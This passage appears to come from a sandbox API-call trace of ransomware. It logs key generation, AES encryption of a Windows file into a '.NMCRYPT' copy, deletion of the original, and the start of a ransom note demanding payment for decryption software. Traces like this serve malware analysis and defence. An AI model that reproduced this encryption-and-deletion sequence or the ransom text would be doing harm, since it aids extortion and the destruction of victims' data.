dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.612] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.613] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0155.614] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0155.614] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0155.615] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0155.615] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0155.615] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad878) returned 1 [0155.615] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0155.615] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0155.615] wcslen (_String="\\\\?\\") returned 0x4 [0155.615] CryptDuplicateKey (in: hKey=0x9ad878, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad2b8) returned 1 [0155.615] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0155.616] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0155.619] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=1434) returned 1 [0155.619] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0155.620] ReadFile (in: hFile=0x1624, lpBuffer=0x607e28, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e28*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0155.620] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0155.620] GetLastError () returned 0x0 [0155.620] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0155.622] ReadFile (in: hFile=0x1624, lpBuffer=0x607e28, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e28*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0155.622] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0155.622] GetLastError () returned 0x0 [0155.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0155.622] ReadFile (in: hFile=0x1624, lpBuffer=0x607e28, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e28*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0155.622] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0155.622] GetLastError () returned 0x0 [0155.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0155.622] ReadFile (in: hFile=0x1624, lpBuffer=0x607e28, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e28*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0155.622] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0155.622] GetLastError () returned 0x0 [0155.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0155.622] ReadFile (in: hFile=0x1624, lpBuffer=0x607e28, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e28*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0155.622] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0155.622] GetLastError () returned 0x0 [0155.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0155.622] ReadFile (in: hFile=0x1624, lpBuffer=0x607e28, nNumberOfBytesToRead=0x9a, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e28*, lpNumberOfBytesRead=0x2d7dc80*=0x9a, lpOverlapped=0x0) returned 1 [0155.622] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x9a, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xa0) returned 1 [0155.622] GetLastError () returned 0x0 [0155.622] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0xa0, lpOverlapped=0x0) returned 1 [0155.622] ReadFile (in: hFile=0x1624, lpBuffer=0x607e28, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e28*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0155.622] WriteFile (in: hFile=0x588, lpBuffer=0x607e28*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607e28*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0155.623] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0x20 [0155.623] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml", dwFileAttributes=0x20) returned 0 [0155.623] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 1 [0155.623] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml")) returned 0 [0155.623] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" [0155.623] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad") returned 1 [0155.623] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\.xXD30B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\.xxd30b.tmp")) returned 0xd30b [0155.624] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\.xXD30B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\.xxd30b.tmp"), dwFlags=0x1) returned 0 [0155.624] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\.xXD30B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\.xxd30b.tmp")) returned 1 [0155.625] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0155.625] wcslen (_String="OK") returned 0x2 [0155.625] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.625] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.625] CryptDestroyKey (hKey=0x9ad878) returned 1 [0155.625] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0155.625] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0155.625] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0 [0155.625] GetLastError () returned 0x12 [0155.625] FindClose (in: hFindFile=0x9ad478 | out: hFindFile=0x9ad478) returned 1 [0155.625] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0155.625] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

